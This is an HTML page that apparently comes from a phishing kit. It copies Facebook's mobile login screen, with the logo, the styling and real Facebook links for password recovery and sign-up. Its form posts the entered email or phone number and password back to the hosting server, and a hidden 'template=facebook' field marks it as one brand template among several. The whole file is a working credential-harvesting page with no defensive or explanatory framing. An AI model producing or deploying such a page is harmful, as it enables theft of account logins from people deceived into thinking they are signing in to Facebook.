<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook – log in or sign up</title>
    <style>
        body, html {
            margin: -50px 0 0;
            padding: 0;
            width: 100%;
            height: 100%;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
            background: linear-gradient(to bottom right, #e6f0ff, #f8e6ff);
            display: flex;
            align-items: center;
            justify-content: center;
            flex-direction: column;
        }
        .container {
            max-width: 380px;
            width: 100%;
            padding: 0 16px;
            text-align: center;
            margin-top: 30px;
        }
        .language {
            position: absolute;
            top: 20px;
            width: 100%;
            text-align: center;
            color: #8a8d91;
            font-size: 12px;
        }
        .logo {
            margin: 10px 0 100px;
            
        }
        .logo img {
            width: 60px;
        }
        .login-form {
            width: 100%;
            max-width: 380px;
            margin-bottom: 20px;
        }
        .form-group {
            margin-bottom: 16px;
            position: relative;
        }
        .form-group input {
            width: 100%;
            padding: 22px;
            margin: 0;
            border: 1px solid #dddfe2;
            border-radius: 10px;
            font-size: 16px;
            box-sizing: border-box;
        }
        .form-group input:focus {
            outline: none;
            border-color: #1877f2;
        }
        .login-button {
            width: 100%;
            padding: 14px;
            background-color: #1877f2;
            border: none;
            border-radius: 20px;
            color: #fff;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            margin-top: 16px;
        }
        .login-button:hover {
            background-color: #165eaf;
        }
        .forgotten-password {
            display: block;
            margin-top: 16px;
            color: #1877f2;
            text-decoration: none;
            font-size: 14px;
        }
        .create-account-container {
            width: 100%;
            position: absolute;
            bottom: 60px;
            left: 50%;
            transform: translateX(-50%);
            padding: 0 16px;
            box-sizing: border-box;
        }
        .create-account {
            display: block;
            width: 100%;
            padding: 12px 0;
            background-color: transparent;
            border: 1px solid #1877f2;
            border-radius: 20px;
            color: #1877f2;
            font-size: 16px;
            font-weight: bold;
            text-decoration: none;
            cursor: pointer;
            box-sizing: border-box;
        }
        .create-account:hover {
            background-color: rgba(24, 119, 242, 0.1);
        }
        .footer {
            position: absolute;
            bottom: 20px;
            width: 100%;
            text-align: center;
            font-size: 12px;
            color: #737373;
        }
        .footer a {
            color: #737373;
            text-decoration: none;
            margin: 0 5px;
        }
    </style>
</head>
<body>
    <div class="language">English (UK)</div>
    <div class="logo">
        <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook Logo">
    </div>
    <div class="container">
        
        <div class="login-form">
            <form method="post">
              <input type="hidden" name="template" value="facebook">
                <div class="form-group">
                    <input type="text" name="username" placeholder="Mobile number or email address">
                </div>
                <div class="form-group">
                    <input type="password" name="password" placeholder="Password">
                </div>
                <button type="submit" class="login-button">Log In</button>
                <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" class="forgotten-password">Forgotten Password?</a>
            </form>
        </div>
        <div class="create-account-container">
            <a href="https://www.facebook.com/signup" class="create-account">Create new account</a>
        </div>
    </div>
    <div class="footer">
        <a href="#">Meta</a> • <a href="#">About</a>
    </div>
</body>
</html>
